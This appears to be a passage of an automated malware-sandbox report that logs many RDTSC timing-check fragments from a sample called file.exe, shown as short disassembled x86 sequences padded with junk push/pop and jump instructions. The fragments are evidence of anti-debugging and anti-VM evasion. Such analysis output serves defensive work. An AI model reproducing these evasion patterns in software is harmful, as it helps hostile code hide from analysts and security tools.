                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168B11 second address: 1168B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168B17 second address: 1168B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168B1B second address: 1168B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168B25 second address: 1168B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BDAA second address: 116BDAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BDAE second address: 116BDC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD648BC9ACAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C4FD second address: 116C509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD648C0B446h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C650 second address: 116C65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C65B second address: 116C68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD648C0B454h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD648C0B454h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C68B second address: 116C69C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C841 second address: 116C84F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C84F second address: 116C855 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172B0D second address: 1172B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1172B13 second address: 1172B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11737E4 second address: 11737E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11737E8 second address: 11737EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11737EC second address: 11737F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11737F5 second address: 1173812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1173812 second address: 1173857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jng 00007FD648C0B462h 0x0000000d push eax 0x0000000e jmp 00007FD648C0B459h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1173857 second address: 1173860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1173860 second address: 117386A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD648C0B446h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117386A second address: 117386E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117386E second address: 1173874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1173EB0 second address: 1173EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1173EB5 second address: 1173EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD648C0B454h 0x0000000e pushad 0x0000000f jmp 00007FD648C0B457h 0x00000014 js 00007FD648C0B446h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11726D9 second address: 11726DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11726DD second address: 11726FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B456h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11726FC second address: 1172716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD648BC9AC6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD648BC9ACBh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BC96 second address: 117BC9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BC9D second address: 117BCBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FD648BC9ACFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BCBC second address: 117BCC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BCC0 second address: 117BCC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B971 second address: 117B977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B977 second address: 117B9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD648BC9AD2h 0x0000000b jmp 00007FD648BC9ACFh 0x00000010 jmp 00007FD648BC9AD7h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B9B7 second address: 117B9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B9BC second address: 117B9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD648BC9AD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B9D7 second address: 117B9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B9DD second address: 117B9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FD648BC9AC6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A9BD second address: 118A9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD648C0B446h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FD648C0B455h 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118A328 second address: 118A347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007FD648BC9AC6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD648BC9AD0h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C919 second address: 118C92F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F8E4 second address: 118F93C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD648BC9AD6h 0x0000000e jmp 00007FD648BC9AD5h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007FD648BC9AC6h 0x0000001f push edx 0x00000020 pop edx 0x00000021 jnc 00007FD648BC9AC6h 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194FEB second address: 1195000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B44Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195000 second address: 1195004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B89E second address: 119B8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5D93 second address: 11A5DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5DAA second address: 11A5DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B453h 0x00000007 jmp 00007FD648C0B456h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007FD648C0B446h 0x00000015 jns 00007FD648C0B446h 0x0000001b popad 0x0000001c pushad 0x0000001d push edi 0x0000001e ja 00007FD648C0B446h 0x00000024 pop edi 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A470F second address: 11A4713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4713 second address: 11A472A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B450h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A472A second address: 11A4735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD648BC9AC6h 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4735 second address: 11A473F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD648C0B446h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A473F second address: 11A4743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4743 second address: 11A475D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD648C0B450h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A475D second address: 11A476E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FD648BC9ACAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A48F0 second address: 11A48F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4A97 second address: 11A4A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4A9B second address: 11A4AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007FD648C0B446h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A83A5 second address: 11A83A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A83A9 second address: 11A83AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A83AD second address: 11A83C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD648BC9AC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jng 00007FD648BC9AC6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A83C3 second address: 11A83C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AB0D3 second address: 11AB0E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF8F7 second address: 11AF8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF8FD second address: 11AF903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF903 second address: 11AF921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD648C0B456h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBA88 second address: 11CBA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9ACAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5A1F second address: 11E5A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B450h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5A33 second address: 11E5A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E47CD second address: 11E47F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD648C0B459h 0x0000000b jbe 00007FD648C0B446h 0x00000011 popad 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4946 second address: 11E494F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E50D9 second address: 11E50DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E50DD second address: 11E50E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E50E1 second address: 11E50E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5286 second address: 11E52B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FD648BC9ACFh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jns 00007FD648BC9AC6h 0x00000016 pop ecx 0x00000017 jp 00007FD648BC9ACCh 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E52B3 second address: 11E52B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5454 second address: 11E5480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FD648BC9AC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 jg 00007FD648BC9AC6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD648BC9AD0h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5480 second address: 11E5484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E55CD second address: 11E55D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E55D1 second address: 11E55E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Ch 0x00000007 jc 00007FD648C0B446h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E55E7 second address: 11E5603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD648BC9AC6h 0x0000000a jmp 00007FD648BC9AD2h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5603 second address: 11E561C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B455h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E9DF8 second address: 11E9E12 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD648BC9ACCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD648BC9AC6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA120 second address: 11EA125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA125 second address: 11EA172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push ebx 0x0000000e jmp 00007FD648BC9AD4h 0x00000013 pop ebx 0x00000014 jnp 00007FD648BC9AD6h 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FD648BC9ACCh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA172 second address: 11EA177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA177 second address: 11EA17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA17D second address: 11EA195 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD648C0B446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA195 second address: 11EA19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA19B second address: 11EA19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EA19F second address: 11EA1A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBC4A second address: 11EBC64 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD648C0B451h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB750 second address: 11EB75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD648BC9AC6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB75E second address: 11EB776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD648C0B44Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB776 second address: 11EB77A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB77A second address: 11EB77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB77E second address: 11EB784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED6EB second address: 11ED706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD648C0B454h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED706 second address: 11ED70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350E5C second address: 5350E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
